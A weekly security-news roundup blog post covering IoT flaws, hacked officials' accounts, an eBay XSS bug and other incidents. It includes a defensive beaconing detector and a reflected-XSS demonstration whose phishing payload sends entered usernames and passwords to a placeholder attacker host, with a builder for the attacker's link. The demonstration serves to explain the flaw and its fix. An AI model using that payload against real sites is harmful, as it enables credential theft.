Weekly Security Roundup #61: Multiple Internet of Things Vulnerabilities Exposed
Do you really need an Internet-connected fridge (that can get infected)?
There are over a hundred security news sources that I monitor for our weekly security roundup. Some publish a couple of articles every day, a few only write weekly, while others write tens of posts daily.
Not a single day passes without news of a fresh hack, data breach or vulnerability warning. They’ve become so common, so dull, that I sometimes surprise myself thinking “Oh, another one? Boring!“.
Despite all the disturbing news, most people don’t care. They don’t adopt even the most basic security measures. They consider themselves immune and are under the delusion that nothing bad can ever happen to them.
Unfortunately, all evidence proves otherwise.
Not that I want to give you nightmares, but please read on:
Security articles of the week
Not even the US Director of National Intelligence is safe from attacks. Cracka, the teenage hacker who last year broke into the CIA director‘s AOL email account, struck again. This time the target was James Clapper, the US Director of National Intelligence.
Cracka contacted a Vice Motherboard journalist and claimed responsibility for breaking into a series of Mr. Clapper’s accounts, including his personal email, his Verizon phone and internet account, and his wife’s Yahoo email. He also had calls to Clapper’s house forwarded to the Free Palestine Movement.
“You Asked why I did it. I just wanted the gov to know people aren’t fucking around, people know what they’re doing and people don’t agree #FreePalestine.”
There has been a lot of talk on this subject recently. If you missed it entirely, the short version is this: a Romanian employee was fired in 2007 for using a Yahoo account at work to send personal messages. He took the case to the European Court of Human Rights, which has just ruled.
The issue is that most of the media misread the ruling, exaggerated it and spread the idea that bosses are now entitled to spy on their employees’ private online conversations.
Here are a few things that were left out:
a) The Yahoo account was created at the employer’s request, so that the employee could communicate with the company’s clients.
b) The employer had notified employees that their online activity would be monitored and that no private conversations were allowed from the company’s computers.
c) The European Court of Human Rights doesn’t dictate a country’s rules.
For further explanations, do read Darren Newman’s article.
Thinking of buying yourself a smartwatch this year? Or do you already own one? Beware of all the new doors they open for cyber criminals.
A student has just demonstrated how attackers can obtain sensitive information, such as your card PIN, from the data recorded by your smartwatch.
We continue the series of news on Internet of Things vulnerabilities. Researchers at Vectra Networks recently showed how a D-Link webcam can be abused by attackers as a persistent command-and-control channel into a network.
“The point of this demonstration is to highlight the real impact that IoT devices pose to the attack surface of a network. […] the barriers to hacking these devices are relatively low, and even the most basic devices can provide the plumbing for a persistent command-and-control channel. While these devices are low-value in terms of hard costs, they still matter to the security of the network, and teams need to keep an eye on them to reveal any signs of malicious behavior.”
They also said they disclosed the issue to D-Link in early December, but it has not been fixed yet.
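The Vectra quote above makes the practical point: a compromised camera is worth watching because it gives an attacker a beacon that calls home on a schedule. The script below is an added example, not Vectra’s research or D-Link’s code. It runs a simple beaconing check over a constructed connection log: connections are grouped by source and destination, and a pair is flagged when it has enough connections and the gaps between them are almost constant (low coefficient of variation). The IP addresses, ports and timestamps are made up for the example.

```python
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed connection log (not real traffic): "timestamp source destination:port".
# 10.0.0.50 stands in for an IoT webcam phoning home every ~60 s with small jitter;
# 10.0.0.21 is a laptop doing ordinary, bursty browsing. All addresses are assumptions.
SAMPLE_FLOWS = """\
2016-01-14T09:00:00 10.0.0.50 203.0.113.7:443
2016-01-14T09:00:12 10.0.0.21 198.51.100.20:443
2016-01-14T09:00:15 10.0.0.21 198.51.100.20:443
2016-01-14T09:00:16 10.0.0.21 198.51.100.20:443
2016-01-14T09:01:01 10.0.0.50 203.0.113.7:443
2016-01-14T09:02:00 10.0.0.50 203.0.113.7:443
2016-01-14T09:02:59 10.0.0.50 203.0.113.7:443
2016-01-14T09:03:40 10.0.0.21 198.51.100.20:443
2016-01-14T09:04:01 10.0.0.50 203.0.113.7:443
2016-01-14T09:05:00 10.0.0.50 203.0.113.7:443
2016-01-14T09:06:02 10.0.0.50 203.0.113.7:443
2016-01-14T09:07:00 10.0.0.50 203.0.113.7:443
2016-01-14T09:07:59 10.0.0.50 203.0.113.7:443
2016-01-14T09:09:01 10.0.0.50 203.0.113.7:443
2016-01-14T09:09:05 10.0.0.21 198.51.100.20:443
2016-01-14T09:09:06 10.0.0.21 198.51.100.20:443
2016-01-14T09:10:00 10.0.0.50 203.0.113.7:443
2016-01-14T09:11:00 10.0.0.50 203.0.113.7:443
2016-01-14T09:14:50 10.0.0.21 198.51.100.20:443
2016-01-14T09:15:00 10.0.0.21 198.51.100.20:443
"""


def parse_flows(text):
    """Parse the log into (timestamp, src, dst) tuples."""
    flows = []
    for line in text.strip().splitlines():
        ts, src, dst = line.split()
        flows.append((datetime.fromisoformat(ts), src, dst))
    return flows


def find_beacons(flows, min_connections=8, max_jitter=0.1):
    """Return (src, dst) pairs whose connection intervals are suspiciously regular.

    jitter = population stdev of the inter-connection gaps divided by their mean.
    A device calling home on a fixed timer lands near 0; human browsing is bursty
    and lands well above 1. Both thresholds are tuning knobs, not magic numbers.
    """
    by_pair = defaultdict(list)
    for ts, src, dst in flows:
        by_pair[(src, dst)].append(ts)

    beacons = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_connections:
            continue  # too few samples to say anything about periodicity
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        jitter = statistics.pstdev(gaps) / mean_gap
        if jitter <= max_jitter:
            beacons.append({
                "src": src,
                "dst": dst,
                "connections": len(times),
                "mean_interval": mean_gap,
                "jitter": jitter,
            })
    return beacons


if __name__ == "__main__":
    for b in find_beacons(parse_flows(SAMPLE_FLOWS)):
        print(f"{b['src']} -> {b['dst']}: {b['connections']} connections, "
              f"every {b['mean_interval']:.1f}s (jitter {b['jitter']:.3f})")
```

The camera is flagged because its eleven gaps average exactly 60 seconds with a standard deviation of about 1.4 s; the laptop makes the same number of connections but its gaps range from one second to several minutes. Real command-and-control implants often randomise their sleep interval to defeat exactly this check, so treat a low jitter score as a lead for the analyst (who is this device, and why is it talking to that host at all?) rather than a verdict.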
In the coming years we will most likely be flooded with news about smart home vulnerabilities. The most recent one concerns smart doorbells. If you had no idea these even existed, don’t worry, you are not alone: I also just found out about them.
Smart doorbells alert you when a visitor presses the bell, let you see the visitor and talk to them, and you don’t even need to be at home to open the front door; all of this is done from a dedicated app on your smartphone.
However, thanks to a security hole, they can also expose your home WiFi password, which opens the door to further risks.
For the 5th Annual State of Application Security Report, 71 popular mobile health apps were tested for security vulnerabilities. The authors also surveyed 1,083 individuals from the US, UK, Germany and Japan: consumers, but also IT decision makers within organizations that produce mobile health and mobile finance apps.
What they found is a huge gap between users’ perception and reality:
– 81% feel their mobile apps are adequately secure (78% of health app users; 87% of app execs)
– 86% of apps tested had at least two critical security vulnerabilities
– 81% of healthcare organizations have been breached in the past 2 years
– 50% of organizations have zero budget allocated for mobile security
A researcher who goes by the name of MLT explained in a detailed post how to exploit an eBay XSS bug in order to conduct phishing attacks.
According to eBay, the bug was quickly patched.
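The kind of bug MLT describes turns a site’s own search page into a phishing page: the victim clicks a link to the real domain, and the injected markup draws a fake sign-in form on it. The sketch below is an added example, not MLT’s post or eBay’s code. The endpoint, the `q` parameter, the page template and the payload are all assumptions for the example; it shows the vulnerable reflection beside the escaped version and the URL an attacker would send.

```python
import html
from urllib.parse import quote, urlparse, parse_qs

# Hypothetical search-results template. The search term is reflected into the
# heading, which is the classic reflected-XSS sink.
PAGE_TEMPLATE = (
    "<html><body><h1>Results for: {query}</h1>"
    "<div id='items'></div></body></html>"
)


def render_vulnerable(query: str) -> str:
    """Reflects the user-supplied query straight into the HTML (vulnerable)."""
    return PAGE_TEMPLATE.format(query=query)


def render_hardened(query: str) -> str:
    """Same page, but the query is HTML-escaped on output, so the browser renders
    '<form ...>' as literal text instead of a form element."""
    return PAGE_TEMPLATE.format(query=html.escape(query, quote=True))


# Constructed phishing payload: a fake "session expired" login form whose action
# points at an attacker-controlled host (attacker.example is a placeholder).
PHISHING_PAYLOAD = (
    "<form action='https://attacker.example/collect' method='post'>"
    "Your session expired. Please sign in again: "
    "<input name='user'><input name='pass' type='password'>"
    "<button>Sign in</button></form>"
)


def build_phishing_url(search_endpoint: str, payload: str) -> str:
    """The link the attacker sends: the real site's URL with the payload in `q`."""
    return f"{search_endpoint}?q={quote(payload, safe='')}"


def handle_request(url: str, render) -> str:
    """Minimal server side: pull `q` from the query string and render the page."""
    params = parse_qs(urlparse(url).query)
    query = params.get("q", [""])[0]
    return render(query)


def contains_injected_form(page: str) -> bool:
    """Crude check used below: does the rendered page contain a real form tag?"""
    return "<form " in page


if __name__ == "__main__":
    url = build_phishing_url("https://shop.example/search", PHISHING_PAYLOAD)
    print("attacker link:", url)
    print("vulnerable page has form:", contains_injected_form(handle_request(url, render_vulnerable)))
    print("hardened page has form:  ", contains_injected_form(handle_request(url, render_hardened)))
```

The fix is contextual output encoding at the sink, not input filtering: `html.escape` turns the payload’s `<`, `>`, `&` and quotes into entities, so the hardened page carries `&lt;form` as text. Because the link points at the legitimate domain, URL-based phishing advice (“check the address bar”) does not help the victim here, which is why XSS on a high-traffic site is valuable to phishers. A Content-Security-Policy header would add a second layer, but it is not a substitute for escaping.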
Evan Andersen, a Canadian software engineer, posted about a bug that let porn from an earlier Google Chrome incognito session leak and load several hours later on a screen within the game Diablo III. He reported the problem to both Google Chrome and Nvidia. Apparently, the issue was not in the hardware company’s memory management but in Apple’s operating system, whose policy the driver follows. Nvidia’s spokesperson stated:
“The NVIDIA driver adheres to policies set by the operating system and our driver is working as expected. We have not seen this issue on Windows, where all application-specific data is cleared before memory is released to other applications.”
During the S4 ICS Security Conference, a U.S. government cyber security official warned about the rise of attacks on industrial control system networks.
Marty Edwards, who runs the Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), said he believed the increase is mainly because control systems are directly connected to the internet.
The discussion comes after the recent cyber attacks on electricity distribution companies in Ukraine, which led to a power outage on December 23rd.
On January 12, Microsoft ended support for Windows XP Embedded SP3 and older Internet Explorer versions. Only Internet Explorer 11 will continue to receive security updates, compatibility fixes and technical support on Windows 7, 8.1 and 10.
Although this change was announced back in August 2014, it still brings plenty of risk: an unsupported browser gets no more security patches, so every new flaw found in it stays open.
Scared? Panicked? Eager to crawl under a rock and live there for the rest of your life? Well, all these feelings are justified. The more you read about cyber security and the never-ending series of hacks and breaches, the more powerless we seem against the ill-intentioned. But do not despair: there is still hope. Stay focused on the things that are within your control and do everything you can to reduce the risks.